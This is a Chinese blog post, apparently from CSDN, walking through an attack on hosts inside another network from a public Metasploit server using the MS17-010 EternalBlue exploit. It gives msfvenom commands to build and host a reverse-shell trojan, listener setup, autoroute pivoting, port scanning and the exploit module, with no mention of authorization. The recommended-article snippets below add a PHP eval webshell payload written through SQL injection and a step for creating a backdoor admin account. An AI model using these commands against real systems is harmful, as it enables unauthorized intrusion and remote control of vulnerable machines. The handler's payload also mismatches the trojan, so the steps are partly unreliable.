利用公网Msf+MS17010跨网段攻击内网

最新推荐文章于 2025-04-11 11:47:04 发布
最新推荐文章于 2025-04-11 11:47:04 发布
阅读量2.7k 收藏 8
点赞数
分类专栏: 渗透实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_36374896/article/details/107005651
版权

其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。

一、准备工作

1.安装了Msf的公网主机+Ubuntu系统
2.一台其他服务器内网存在445漏洞
3.细心,细心,细心,钻研,钻研!!!

二、反弹一个shell

第一步:公网主机操作

生成msf木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

第二步:Msf监听端口:6666

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 111.111.111.111
set LPORT 6666
exploit

添加路由

run get_local_subnets (获取当前路由)
run autoroute -s 192.168.3.0/24 (添加路由)
run autorouute -d //删除添加的路由 (有需要才用)
run autoroute -p (查看已添加路由)

使用Payload进行攻击

background(转换到后台)
use scanner/portscan/tcp (先扫描开放445端口的PC)
exploit(开始扫描)

注意:扫描出来开放了445端口的PC,不一定就存在445漏洞。(如何精准定位?)

如何列出那些存在445漏洞的PC?

使用MS17-010检测工具检测,github自行下载

攻击正式开始

use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块)
set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP)
exploit(执行攻击)

攻击完成,并且会自动返回一个shell控制台

[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 9131
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
ONE DAY |网络安全渗透测试之跨网段攻击
EverUP
05-04 2766
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
Windows网络服务渗透测试实战-跨网段攻击
c_lanxiaofang的博客
05-19 6840
一、实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二、实验目的及要求 掌握对跨网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
ms17-010 发现与攻击msf
最新发布
2501_90930793的博客
04-11 283
12.账户在administer组中创建成功后,使用命令net start TermService启用远程连接,并在自己的电脑上进行远程连接。5.RHOSTS 为目标地址且必须输入,用set RHOSTS ip 命令对其进行漏洞排查,THREADS 参数为。7.先查看参数,LHOST 为本地会话监听地址,LPORT 为本地会话监听端口,所有需要为kali设置一个监听地址。10.在目标电脑中创建一个自己的账户,并将该账户添加进Administer组(123456为密码,wr为这账户名)
利用Metasploit Framework(msf)进行内网(域)渗透
初学者L_言的博客
07-03 6600
只要去往 192.168.47.0这个网段的数据都将通过 Session转发出去!!! 内网进行端口扫描:use auxiliary/scanner/portscan/tcp use exploit/windows/smb/ms08_067_netapi
跨网段攻击
moli_a的博客
05-05 1431
跨网段攻击
跨网段攻击模拟实验
weixin_65336001的博客
05-05 865
网络安全小白初学者——跨网段攻击
msf+proxychains组合搭建socks5隧道 | 内网穿透
ULGANOY的博客
08-19 981
socks5隧道 | 内网穿透技术学习
【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控
HBohan的博客
10-23 1645
内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 【查看资料】 1、进去一看,典型的sql注入 2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>" into outfile 'C:
内网渗透实战技巧 PDF文件
01-02
同时,文章也提到了红蓝对抗的概念,即在实际的网络安全环境中,渗透测试者需要模拟攻击者的角色,对内网进行渗透,以便更好地理解和掌握内网安全防护的知识。 文章的最后提到,由于文章内容是通过OCR扫描生成的,...
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
07-27
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
内网渗透之——msf工具使用
wsnbbz的博客
03-16 7356
1.msfconsole 作用: 管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。 模块介绍: exploits:攻击脚本 payloads:攻击载荷(攻击效果控制) auxiliaru:辅助模块(扫描工具等) post:后渗透模块(提取信息) encoders编码模块 nops:无操作生成器 2.msfvenom 作用: 制作木马 3.msfencode 作用: 对木马...
好文转载 ONE DAY |网络安全渗透测试之跨网段攻击
AI_data_cloud的博客
05-05 1126
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
msf手机渗透二(实现外网渗透)
weixin_63204687的博客
11-07 3572
内网穿透官网注册飞鸽内网穿透开通隧道,然后本地端口与公网端口绑定,这样访问公网的所有请求最后都会传入本地端口。在本地生成apk的时候使用公网IP和对应Port而对其进行监听的时候设置本地IP和port。这样app在别人手机上被点击以后会直接链接公网对应IP端口,因为公网的已经和本地的绑定了,并且在电脑监听的时候监听的是本地端口,所以最后链接返回给本地电脑。使用公网开通隧道本质上是一个桥梁作用,连接了不同局域网之间的通信。
Metasploit 内网渗透二—— 实战渗透操作--感受渗透流程,具体做什么 -永恒之蓝漏洞
天下著书立传者,皆为我师
04-24 3157
渗透测试实战练习1——永恒之蓝漏洞(渗透攻击 Win7 主机并远程执行命令)以及mysql空密码扫描利用(获取mysql数据库中信息)
BeEF+msf对用户浏览器的攻击测试
liveJQ
02-08 2524
什么是BeEF? BeEF是The Browser Exploitation Framework的缩写,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击利用。它是一种专注于Web浏览器的渗透测试工具。 随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强...
使用浏览器作为代理从公网攻击内网
neal1991的专栏
04-15 1998
介绍在Forcepoint,我们不断寻求改善我们产品所提供的防护。为此,我们经常研究不寻常或潜在新颖的攻击技术。最近的一个研究课题是从公网发起的针对localhost...
ms17010漏洞利用(主机漏洞利用
qq_38989921的博客
03-22 3722
攻击机:kali ip:192.168.248.129 靶机:win7 x64 enterprise ip: 192.168.248.130 启动msfMsfconsole search ms 检查msf库里是否存在ms17-010漏洞 Nmap检测靶机开放端口:nmap –sV 192.168.248.130 445端口开放,存在攻击条件 配置exploit 设置目标ip 配置payload: 攻击msf exploit(ms17_010_eternalblue) > exp
假如我有一台内网靶机上面存在msf17-010漏洞,我已经获取了一台内外网互通靶机的权限,如何反弹内网机器的shell
02-25
好的,用户的问题是关于如何利用MS17-010漏洞,通过一个已经控制的内外网互通靶机,反弹内网靶机的shell。...通过上述方法,你可以利用已控跳板机作为“跳板”,穿透内网隔离攻击存在MS17-010漏洞的靶机。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值